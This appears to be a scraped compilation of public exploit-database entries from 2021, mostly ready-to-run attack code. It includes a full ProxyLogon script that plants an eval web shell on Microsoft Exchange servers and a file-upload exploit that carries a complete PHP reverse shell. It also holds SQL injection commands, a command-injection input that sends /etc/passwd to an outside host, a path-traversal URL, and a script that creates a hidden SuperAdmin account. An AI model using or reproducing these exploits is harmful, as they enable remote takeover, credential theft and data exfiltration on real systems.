ISHACK AI BOT

# Exploit Title: Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) # Date: 2021-03-10 # Exploit Author: testanull # Vendor Homepage: https://www.microsoft.com # Version: MS Exchange Server 2013, 2016, 2019 # CVE: 2021-26855, 2021-27065 import requests from urllib3.exceptions import InsecureRequestWarning import random import string import sys def id_generator(size=6, chars=string.ascii_lowercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) if len(sys.argv) < 2: print("Usage: python PoC.py <target> <email>") print("Example: python PoC.py mail.evil.corp [email protected]") exit() requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) target = sys.argv[1] email = sys.argv[2] random_name = id_generator(3) + ".js" user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ahihi.aspx" shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["exec_code"],"unsafe");}</script>' legacyDnPatchByte = "68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a" autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover> """ % email print("Attacking target " + target) print("=============================") print(legacyDnPatchByte.decode('hex')) FQDN = "EXCHANGE" ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522", "User-Agent": user_agent}, verify=False) if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers: FQDN = ct.headers["X-FEServer"] ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN, "Content-Type": "text/xml", "User-Agent": user_agent}, data=autoDiscoverBody, verify=False ) if ct.status_code != 200: print("Autodiscover Error!") exit() if "<LegacyDN>" not in ct.content: print("Can not get LegacyDN!") exit() legacyDn = ct.content.split("<LegacyDN>")[1].split("</LegacyDN>")[0] print("Got DN: " + legacyDn) mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00" ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN, "Content-Type": "application/mapi-http", "User-Agent": user_agent }, data=mapi_body, verify=False ) if ct.status_code != 200 or "act as owner of a UserMailbox" not in ct.content: print("Mapi Error!") exit() sid = ct.content.split("with SID ")[1].split(" and MasterAccountSid")[0] print("Got SID: " + sid) proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r> """ % sid ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN, "Content-Type": "text/xml", "User-Agent": user_agent }, data=proxyLogon_request, verify=False ) if ct.status_code != 241 or not "set-cookie" in ct.headers: print("Proxylogon Error!") exit() sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0] msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0] print("Got session id: " + sess_id) print("Got canary: " + msExchEcpCanary) ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, sess_id, msExchEcpCanary), "User-Agent": user_agent }, verify=False ) if ct.status_code != 200: print("Wrong canary!") print("Sometime we can skip this ...") rbacRole = ct.content.split("RBAC roles:</span> <span class='diagTxt'>")[1].split("</span>")[0] # print "Got rbacRole: "+ rbacRole print("=========== It means good to go!!!====") ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json={"filter": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}}, verify=False ) if ct.status_code != 200: print("GetOAB Error!") exit() oabId = ct.content.split('"RawIdentity":"')[1].split('"')[0] print("Got OAB id: " + oabId) oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, "properties": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "ExternalUrl": "http://ffff/#%s" % shell_content}}} ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json=oab_json, verify=False ) if ct.status_code != 200: print("Set external url Error!") exit() reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, "properties": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": shell_absolute_path}}} ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json=reset_oab_body, verify=False ) if ct.status_code != 200: print("Write Shell Error!") exit() print("Successful!")

# Exploit Title: Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated) # Exploit Author: Richard Jones # Date: 2021-03-11 # Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html # Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 # Usage. # Change Target_IP, REV_IP, REV_PORT to your own import requests def main(): ##### Change info here ##### TARGET_IP="127.0.0.1" REV_IP="127.0.0.1" REV_PORT=9999 ############################ LOGIN="/asistorage/login.php" MAILING_LIST="/asistorage/modules/random/index.php?view=add" UPLOAD_URL="/asistorage/modules/random/upload.php" VIEW_ITEM="/asistorage/modules/random/index.php" CALL_URL="/asistorage/modules/random/uploads/" s = requests.Session() def phpshell(): return """ <?php // Copyright (c) 2020 Ivan Å incek // v1.1 // Requires PHP v5.0.0 or greater. // Works on Linux OS, macOS and Windows OS. // See the original script at https://github.com/pentestmonkey/php-reverse-shell. header('Content-Type: text/plain; charset=UTF-8'); class Shell { private $addr = null; private $port = null; private $os = null; private $shell = null; private $descriptorspec = array( 0 => array('pipe', 'r'), // shell can read from STDIN 1 => array('pipe', 'w'), // shell can write to STDOUT 2 => array('pipe', 'w') // shell can write to STDERR ); private $options = array(); // proc_open() options private $buffer = 1024; // read/write buffer size private $clen = 0; // command length private $error = false; // stream read/write error public function __construct($addr, $port) { $this->addr = $addr; $this->port = $port; if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS $this->os = 'LINUX'; $this->shell = '/bin/sh'; } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) { $this->os = 'WINDOWS'; $this->shell = 'cmd.exe'; $this->options['bypass_shell'] = true; // we do not want a shell within a shell } else { echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n"; exit(0); } } private function daemonize() { set_time_limit(0); // do not impose the script execution time limit if (!function_exists('pcntl_fork')) { echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n"; } else { if (($pid = pcntl_fork()) < 0) { echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n"; } else if ($pid > 0) { echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n"; exit(0); } else if (posix_setsid() < 0) { // once daemonized you will no longer see the script's dump echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n"; } else { echo "DAEMONIZE: Completed successfully!\n"; } } umask(0); // set the file/directory permissions - 666 for files and 777 for directories } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream $this->error = true; // set global error flag echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n"; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream $this->error = true; // set global error flag echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n"; } return $bytes; } // read/write method for non-blocking streams private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { echo $data; // script's dump if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length } } // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) // we must read the exact byte length from a stream and not a single byte more private function brw($input, $output, $iname, $oname) { $size = fstat($input)['size']; if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT $size -= $this->offset($input, $iname, $this->clen); // we do not like that $this->clen = 0; } $fragments = ceil($size / $this->buffer); // number of fragments to read $remainder = $size % $this->buffer; // size of the last fragment if it is less than the buffer size while ($fragments && ($data = $this->read($input, $iname, $remainder && $fragments-- == 1 ? $remainder : $this->buffer)) && $this->write($output, $oname, $data)) { echo $data; // script's dump } } private function offset($stream, $name, $offset) { $total = $offset; while ($offset > 0 && $this->read($stream, $name, $offset >= $this->buffer ? $this->buffer : $offset)) { // discard the data from a stream $offset -= $this->buffer; } return $offset > 0 ? $total - $offset : $total; } public function run() { $this->daemonize(); // ----- SOCKET BEGIN ----- $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30); if (!$socket) { echo "SOC_ERROR: {$errno}: {$errstr}\n"; } else { stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS // ----- SHELL BEGIN ----- $process = proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options); if (!$process) { echo "PROC_ERROR: Cannot start the shell\n"; } else { foreach ($pipes as $pipe) { stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS } // ----- WORK BEGIN ----- fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n"); while (!$this->error) { if (feof($socket)) { // check for end-of-file on SOCKET echo "SOC_ERROR: Shell connection has been terminated\n"; break; } else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams } // use proc_get_status() instead $streams = array( 'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR 'write' => null, 'except' => null ); $num_changed_streams = stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS if ($num_changed_streams === false) { echo "STRM_ERROR: stream_select() failed\n"; break; } else if ($num_changed_streams > 0) { if ($this->os === 'LINUX') { if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } else if ($this->os === 'WINDOWS') { // order is important if (in_array($socket, $streams['read'])) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } } } // ------ WORK END ------ foreach ($pipes as $pipe) { fclose($pipe); } proc_close($process); } // ------ SHELL END ------ fclose($socket); } // ------ SOCKET END ------ } } // change the host address and/or port number as necessary $reverse_shell = new Shell('OLDIP', OLDPORT); $reverse_shell->Run(); ?>""" def login(url,username, password): try: data = { "uname":username, "upass":password, "btnlogin":"" } r = s.post(url,data=data, verify=False) page = r.text if "Invalid Username or Password, please try again." in page: return False else: return True except : return False def uploadShell(url): s.get(f"{url}{MAILING_LIST}") # Call page fileData = { 'uploaded_file':("rev.php",str(phpshell().replace("OLDIP", REV_IP).replace("OLDPORT", str(REV_PORT))).encode(), "application/octet-stream")} data={ "pname":"", "pname":"a", 'cutoff':'', 'cutoff':'a', 'projectname':'', 'type':'a', 'projectname':'', 'dsend':'2029-03-19', 'desc':'a', 'MAX_FILE_SIZE':100000, 'Uploader':'', } up_url=f"{url}{UPLOAD_URL}" r = s.post(up_url, files=fileData,data=data, verify=False) if r.status_code == 200: print("shell uploaded") else: print("Shell upload failed") exit(0) r = s.get(f"{url}{VIEW_ITEM}") page = r.text DL_URL=page.split("download.php?filename=")[1].split("\">")[0] return DL_URL #Login base_url=f"http://{TARGET_IP}" login_url=f"{base_url}{LOGIN}" b=login(login_url, "jim", "jim") if not b: print("Login failed, Try again...") exit(0) #CAll shell base=f"{base_url}" CALL_URL_PART=uploadShell(base) c_url=f"{base}{CALL_URL}{CALL_URL_PART}" s.get(c_url) #Shell can be found at http:/TARGET//asistorage/modules/random/uploads/ if __name__ == "__main__": main()

# Exploit Title: Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC) # Exploit Author : Enes Özeser # Exploit Date: 2021-02-28 # Vendor Homepage : https://www.nsauditor.com/ # Link Software : https://www.nsauditor.com/downloads/nhsi_setup.exe # Version: 1.6.4.0 # Tested on: Windows 10 # Steps: 1- Run the python script. (payload.py) 2- Open payload.txt and copy content to clipboard. 3- Run 'Nsasoft Hardware Software Inventory 1.6.4.0'. 4- Register -> Enter Registeration Code 5- Paste clipboard into the "Key" or "Name". 6- Click on OK. 7- Crashed. ---> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 300 try: f = open("payload.txt","w") f.write(buffer) f.close() print "File created!" except: print "File cannot be created!"

# Exploit Title: Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection # Exploit Author: Richard Jones # Date: 2021-01-26 # Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html # Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 Steps. 1. Run sqlmap "sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch 2. Parameter: uname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&upass=w&btnlogin= Exploit paths: Database: sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql --dbs Tables: sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql -D asidatabase --tables [11 tables] +------------+ | accounts | | attendance | | contacts | | employee | | gallery | | msexcel | | msppt | | msword | | oic | | random | | sign | +------------+

# Exploit Title: Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths # Date: 2020-11-6 # Exploit Author: Mohammed Alshehri # Vendor Homepage: https://www.vembu.com/ # Software Link: https://sg-build-release.s3.amazonaws.com/BDRSuite/V420/4202020051312/Vembu_BDR_Backup_Server_Setup_4_2_0_1_U1_GA.exe # Version: Version 4.2.0.1 U1 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc "hsflowd" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: hsflowd TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\hsflowd.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Host_sFlow_Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507>sc qc "VembuBDR360Agent" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VembuBDR360Agent TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\VembuBDR360Agent.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VembuBDR360Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507>sc qc "VembuOffice365Agent" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VembuOffice365Agent TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuOffice365Agent\bin\VembuOffice365Agent.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VembuOffice365Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: Zenario CMS 8.8.53370 - 'id' Blind SQL Injection # Date: 05/02/2021 # Exploit Author: Balaji Ayyasamy # Vendor Homepage: https://zenar.io/ # Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8 # Version: 8.8.53370 # Tested on: Windows 10 Pro 19041 (x64_86) + XAMPP 7.4.14 # CVE: CVE-2021-26830 # Reference - https://edhunter484.medium.com/blind-sql-injection-on-zenario-cms-b58b6820c32d Step 1 - Login to the zenario cms with admin credentials. Step 2 - Go to modules and select plugin library. Step 3 - Select any plugin and press delete button. Copy the delete request and send it to the sqlmap. Command - sqlmap -r request.txt -p id

# Exploit Title: MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery # Date: 24 March 2021 # Exploit Author: bl4ckh4ck5 # Vendor Homepage: http://magpierss.sourceforge.net/ # Software Link: https://sourceforge.net/projects/magpierss/files/magpierss/magpierss-0.72/magpierss-0.72.tar.gz/download # Version: MagpieRSS 0.72 and maybe older once aswell. # Tested on: Linux debian buster with default apache install. In MagpieRSS 0.72 on the /scripts/magpie_debug.php?url=testtest and /scripts/magpie_simple.php page i noticed there was a command injection in the RSS URL field when you send a https url and click the Parse RSS button. if you would send "https://www.example.com? -o /var/www/html/testtest.php" as input it would save the url output to the testtest.php file directly in the /var/www/html/ folder. the "?" is importent or it won't work. it is also possible to read any file if you send it like this "https://zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net? --data '@/etc/passwd'" then the page "zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net" would receive as POST data the /etc/passwd file. Outside of that because it uses the curl request directly from the prompt it is not restricted and it is possible to request internal pages like 127.0.0.1 however it is restricted to https requests only, but you can partionaly work arround that by sending the url like this "https://www.example.com? http://localhost/server-status/" then it also can send it to a http domain however then it is blind ssrf but on https domains you can make it vissable by first saving it to a file and if you can't write in the /var/www/html folder you sometimes can write it to the /tmp/testtest.txt and use "https://www.example.com? --data '@/tmp/testtest.txt'" to retrieve that file. The problem occures in the file /extlib/Snoopy.class.inc on line 660: https://github.com/kellan/magpierss/blob/04d2a88b97fdba5813d01dc0d56c772d97360bb5/extlib/Snoopy.class.inc#L660 On that page there they use a escapeshellcmd command to escape the https url however they didn't put it between quotes. so it's possible to add a "-" to this and rewrite the curl command on the /scripts/magpie_debug.php and /scripts/magpie_simple.php page. from there on you can esculate it to Server side request forgery or Code injection. It mostlickly affects most versions but i have only tested it on version 0.72.

# Exploit Title: rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated) # Date: 2021-03-12 # Exploit Author: 5a65726f # Vendor Homepage: https://www.rconfig.com # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip # Version: rConfig v3.9.6 # Install scripts : # https://www.rconfig.com/downloads/scripts/install_rConfig.sh # https://www.rconfig.com/downloads/scripts/centos7_install.sh # https://www.rconfig.com/downloads/scripts/centos6_install.sh # Tested on: centOS 7 # Notes : If you want to reproduce in your lab environment follow those links : # http://help.rconfig.com/gettingstarted/installation # then # http://help.rconfig.com/gettingstarted/postinstall # Description: rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path. ajaxGetFileByPath.php allows authenticated users to download any file on the server. The following steps can be carried out in duplicating this vulnerability. - Login the rConfig application with your credentials. - Enter the following link to your browser: http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd

# Exploit Title: QNAP QVR Client 5.0.0.13230 - 'QVRService' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2021-03-14 # Vendor Homepage: https://www.qnap.com # Tested Version: 5.0.0.13230 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "QVR" | findstr /i /v """ QVRService QVRService C:\Program Files (x86)\QNAP\QVR\QVRService.exe Auto # Service info: C:\>sc qc "QVRService" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: QVRService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\QNAP\QVR\QVRService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : QVRService DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2021-03-14 # Vendor Homepage: https://www.realtek.com/en/ # Tested Version: 700.1631 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Realtek" | findstr /i /v """ Realtek11nSU Realtek11nSU C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtlService.exe Auto # Service info: C:\>sc qc "Realtek11nSU" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Realtek11nSU TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtlService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Realtek11nSU DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2021-03-14 # Vendor Homepage: https://www.luidia.com # Tested Version: 2.5.0.9 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\ Windows\\" | findstr /i "eBeam" | findstr /i /v """ eBeam Device Service eBeam Device Service C:\Program Files (x86)\Luidia\eBeam Device Service\eBeamDeviceServiceMain.exe Auto # Service info: C:\>sc qc "eBeam Device Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: eBeam Device Service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Luidia\eBeam Device Service\eBeamDeviceServiceMa in.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : eBeam Device Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2021-03-14 # Vendor Homepage: https://www.luidia.com # Software Link: http://down.myequil.com/dn/setup/ScrapBook_win/down.html # Tested Version: 3.6 # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "eBeam" | findstr /i /v """ eBeam Stylus Driver eBeam Stylus Driver C:\Program Files (x86)\Luidia\eBeam Stylus Driver\eBeam_Stylus_Driver.exe Auto # Service info: C:\>sc qc "eBeam Stylus Driver" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: eBeam Stylus Driver TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Luidia\eBeam Stylus Driver\eBeam_Stylus_Driver.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : eBeam Stylus Driver DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure # Date: 04-02-2021 # Exploit Author: Berkan Er # Vendor Homepage: https://www.sonlogger.com/ # Version: 4.2.3.3 # Tested on: Windows 10 Enterprise x64 Version 1803 # A remote attacker can be create an user with SuperAdmin profile #!/usr/bin/python3 import argparse import string import sys from random import random import requests import json banner = ''' Sonlogger Log and Report System - v4.2.3.3 Remote SuperAdmin Account Creation Vulnerability / Information Disclosure Berkan Er <[email protected]> @erberkan ''' commonHeaders = { 'Content-type': 'application/json', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest' } def get_random_string(): res = ''.join(random.choices(string.ascii_lowercase, k=8)) print(res) return str(res) def getProductInfo(host, port, flag): response = requests.post('http://' + host + ':' + port + '/shared/GetProductInfo', data={}, headers=commonHeaders) print("[*] Status code: ", response.status_code) print("[*] Product Version: ", response.json()['Version']) info_json = json.dumps(response.json(), indent=2) response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders) user_json = json.dumps(response_1.json(), indent=2) if flag: print("\n*** Product Infos=\n" + info_json) print("\n*** Users=\n" + user_json) if response.json()['Version'] == '4.2.3.3': print("[+] It seems vulnerable !") return True else: print("[!] It doesn't vulnerable !") return False def createSuperAdmin(host, port): payload = '''{ '_profilename':'superadmin_profile', '_username':'_hacker', '_password':'_hacker', '_fullname':'', '_email':'' }''' response = requests.post('http://' + host + ':' + port + '/User/saveUser', data=payload, headers=commonHeaders) print("[*] STAUTS CODE:", response.status_code) print("[!] User has been created ! \nUsername: _hacker\nPassword: _hacker") response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders) json_formatted_str = json.dumps(response_1.json(), indent=2) print("\n*** Users=\n" + json_formatted_str) def main(): print(banner) try: host = sys.argv[1] port = sys.argv[2] action = sys.argv[3] if action == 'TRUE': if getProductInfo(host, port, False): createSuperAdmin(host, port) else: getProductInfo(host, port, True) print("KTHNXBYE!") except: print("Usage:\npython3 sonlogger-superadmin_create.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >\n\nIP:\tIP " "Address of Sonlogger host\nPORT:\tPort number of Sonlogger host\nTRUE:\tCreate User\nFALSE:\tShow Product " "Infos") print("\nExample: python3 sonlogger-superadmin_create.py 192.168.1.10 5000 TRUE\n") if __name__ == "__main__": main()

